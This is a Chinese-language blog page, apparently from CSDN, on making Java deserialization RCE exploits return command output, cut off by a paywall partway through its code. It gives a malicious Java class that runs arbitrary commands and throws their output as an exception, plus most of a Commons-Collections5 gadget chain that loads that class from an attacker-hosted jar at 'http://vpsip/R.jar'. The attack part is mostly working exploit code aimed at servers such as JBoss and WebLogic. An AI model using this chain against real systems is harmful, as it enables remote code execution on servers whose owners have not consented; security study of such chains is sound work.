java反序列化RCE回显研究

最新推荐文章于 2024-06-12 11:20:56 发布
最新推荐文章于 2024-06-12 11:20:56 发布
阅读量2.4k 收藏
点赞数
分类专栏: java 文章标签: java 程序员 编程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/java276582434/article/details/90550578
版权
本文详细介绍了两种常见的Java反序列化 Remote Code Execution (RCE) 回显方法:1) 使用URLClassLoader加载远程恶意类,通过抛出异常获取回显;2) 利用defineClass加载byte[],结合容器内部响应实现回显。具体案例涉及Jboss和Weblogic,并分析了回显的实现机制。
摘要由CSDN通过智能技术生成

总结一下常见反序列化RCE回显几种方式如下:

  1. a).使用java.net.URLClassLoader类,远程加载自定义类(放在自己服务器上的jar包),可以自定义方法执行。 
    b).在自定义类中,抛出异常,取得回显结果。 
    eg:Jboss报错返回命令执行结果。
  2. 利用defineClass加载byte[]返回Class对象,不用远程加载恶意类。
  3. 直接利用RCE将执行的命令写入服务器文件中,再次访问得到执行命令结果。

1、URLClassLoader加载远程恶意类,抛出异常回显

恶意类如下:

import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.net.Socket;

public class R
{
    public R(String commond) throws Exception {
        reverseConn(commond);
    }

    public void reverseConn(String commond) throws Exception {

            //执行命令
            Process proc = Runtime.getRuntime().exec(commond);
            BufferedReader br = new BufferedReader(new InputStreamReader(proc.getInputStream()));
            StringBuffer sb = new StringBuffer();
            String line;
            while ((line = br.readLine()) != null)
            {
                sb.append(line).append("\n");
            }
            String result = sb.toString();
            Exception e=new Exception(result);
            throw e;
    }
}

将恶意类打成jar包,把jar包放在服务器上。

javac R.java //先编译成class文件
jar -cvf R.jar R.class //打成jar包

采用Commons-Collections5 gadgets触发反序列化报错回显,运行如下代码:

package test;
import java.io.*;
import java.lang.annotation.Retention;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.util.HashMap;
import java.util.Map;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;
public class Test{
    public InvocationHandler getObject(final String command) throws Exception {
        // inert chain for setup
        final Transformer transformerChain = new ChainedTransformer(
                new Transformer[] { new ConstantTransformer(1) });
        // real chain for after setup
        final Transformer[] transformers = new Transformer[] {
                new ConstantTransformer(java.net.URLClassLoader.class),
                // getConstructor class.class classname
                new InvokerTransformer("getConstructor",
                        new Class[] { Class[].class },
                        new Object[] { new Class[] { java.net.URL[].class } }),

                new InvokerTransformer(
                        "newInstance",
                        new Class[] { Object[].class },
                        new Object[] { new Object[] { new java.net.URL[] { new java.net.URL(
                                "http://vpsip/R.jar") } } }),
                // loadClass String.class R
                new InvokerTransformer("loadClass",
                        new Class[] { String.class }, new Object[] { "R" }),
                // set the target reverse ip and port
                new InvokerTransformer("getConstructor",
                        new Class[] { Class[].class },
                        new Object[] { new Class[] { String.class } }),
                // invoke
                new InvokerTransformer("newInstance",
                        new Class[] { Object[].class },
                        new Object[] { new String[] { command } }),
                new ConstantTransformer(1) };
        final Map innerMap = new HashMap();
        final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
        //this will generate a AnnotationInvocationHandler(Override.class,lazymap) invocationhandler
        InvocationHandler invo = (InvocationHandler) getFirstCtor(
                "sun.reflect.annotation.AnnotationInvocationHandler")
                .newInstance(Retention.class,
最低0.47元/天 解锁文章
程序员林子
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Java反序列化回显
02-09 1176
Java反序列化漏洞利用中,结果回显是一个需要解决的问题,这里记录学习到的一些回显方法。
JAVA反序列化漏洞命令执行回显方法
K8哥哥
07-11 565
简介 在JAVA反序列化漏洞中,可能会有一些漏洞无法直接回显,这时我们可能需外带,通过WEB、FTP、DNS等外带,但是我不喜欢把自己的结果传到别人的网站上,本文教大家如何把结果回显到自己的VPS上,本文主要是JAVA代码,其它命令执行漏洞同理。 启动WEB Ladon web 9001 JAVA执行命令 javac main.java & java main 注意:get提交换行符需换成别的字符 import java.io.BufferedReader; import java.io.Inpu
Java对象序列化和反序列化的基本方法及应用场景
Itmastergo的博客
06-12 1480
序列化(Serialization)是将对象的状态转换为字节流的过程,这样它们就可以通过网络传输或存储到文件系统中。反序列化(Deserialization)则是将字节流转换回对象的过程,恢复原有的状态。远程通信:例如RMI(Remote Method Invocation)和RPC(Remote Procedure Call)中,需要将对象从一台机器传输到另一台机器。缓存:对象可以被序列化并存储到缓存中,以便后续快速读取。持久化:将对象存储到文件或数据库中,以便后续恢复。深拷贝。
Java反序列化回显解决方案
Summer's blog
06-12 10000
于无常处知有情,于有情处知众生............... 学习无止境,努力就完事。
java反序列化
m0_51632271的博客
09-05 1396
java反序列化--我的学习思路
Java反序列化
m0_46390077的博客
11-22 980
​ PHP的反序列化java反序列化是两种不同的型,序列化和反序列化本身没有漏洞点,只是为了实现数据的完整高效的传输。​ PHP反序列漏洞是由于里面的魔术方法调用了某个函数,该危险函数又调用了别的函数,最终执行到了危险函数的位置转存中…(img-6467S4OE-1700661213322)]
Java反序列化回显解决方案.docx
12-19
Java反序列化回显解决方案是指在Java中,使用反序列化来执行命令,导致RCE(Remote Code Execution)的解决方案。该解决方案主要涉及到Java反序列化机制和ClassLoader的使用。 首先,Java反序列化机制允许攻击...
java反序列化工具
11-21
Java反序列化是一种将已序列化的对象状态转换回对象的过程,它是Java平台中持久化数据的一种常见方式。在Java应用程序中,序列化用于保存对象的状态以便稍后恢复,或者在网络间传输对象。然而,这个过程也可能引入...
Java反序列化实战.pdf
08-08
### Java反序列化实战知识点详解 #### 一、反序列化概述 - **定义**:在计算机科学领域,反序列化是指将字节流或文本流等数据转换回其原始对象结构的过程。这一过程通常与序列化相对应,序列化是将对象的状态转化...
fastjson1.2.24反序列化RCE
最新发布
06-24
然而,像许多处理序列化和反序列化的库一样,Fastjson在某些版本中存在安全风险,其中之一便是“Fastjson 1.2.24反序列化RCE”漏洞。这个漏洞允许攻击者通过精心构造的JSON输入,在目标系统上执行任意代码,从而可能...
JAVA反序列化jboss 进入后台(及送JAVA反序列化工具和中国cai dao)
12-10
JAVA反序列化教程,利用JAVA反序列化软件进行检测,寻找,已经涉及到部分CMD命令和寻找网页IP,以及远程登陆简单介绍
Java反序列化工具.zip
05-31
java反序列化工具;weblogic反序列化工具;jboss反序列化工具。
Java反序列化漏洞利用工具(全)
09-14
java反序列化漏洞利用工具包含jboss|weblogic,网上其实有很多,但是用别人的工具收30分是不是有点不厚道,所以我用自己的分下载下来,然后以最低分贡献给大家,上次没有审核通过,希望这次可以……
java 反序列化_Java-序列化-反序列化
weixin_36110673的博客
02-24 222
ThanksJava中的序列化对象是存储在内存中,但如果我们想把对象持久化存到硬盘上该怎么做呢?在Java中,可以使用序列化:Serialization(序列化)是一种将对象以一连串的字节描述的过程;反序列化deserialization是一种将这些字节重建成一个对象的过程。简单例子Java中必须实现接口Serializable才能够被序列化,而Serializable接口没有方法,更像是个标记。...
java反序列化_JAVA反序列化机制
weixin_34175388的博客
02-12 371
最近看了下JAVA反序列化机制,发现它还是比想像中的要兼容些。不过还是有一些陷阱,跨语言跨平台的协议才是王道。反序列化过程如下图:几个关键点:1.ObjectStreamClass的matchFields方法:此处会比较本地与序列化数据流中对象字段,对本地不存在的字段做过滤标识;如果本地存在同名但型不同,则抛错。2.readOrdinaryObject的处理:会调用ObjectStreamCla...
漫谈Java反序列化
Summer's blog
06-02 5236
Java反序列化漏洞探索出了Java安全的新纪元。开发人员为什么要反序列化呢?
Java反序列化学习
就爱喝酸奶的博客
07-22 3131
Java反序列化学习1.JAVA反射2.JAVA序列化与反序列化3.漏洞分析3.1 Apache commons-collections3.1.1 ConstantTransformer3.1.2 InvokerTransformer3.1.3 ChainedTransformer3.1.4 TransformedMap.decorate()3.1.5 LazyMap3.2 构造POP3.2.1 ...
初识Java反序列化
m0_71563599的博客
06-04 1586
研究某产品反序列化EXP时,搜集到的POC只有一段16进制字节序列难以利用,遂有下文对Java序列化和反序列化的学习。大致内容如下:序列化和反序列化示例序列化数据组成解构反序列化漏洞形成原理序列化: 将程序运行时所需要的Java对象转化为字节序列并存储在文件系统中,一般为.ser后缀的文件,ObjectOutputStream.writeObject()方法可以将对象序列化。反序列化: 将存储在文件系统的字节序列转化成对象供程序使用,ObjectInputStream.readObject()方法可以将字节
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值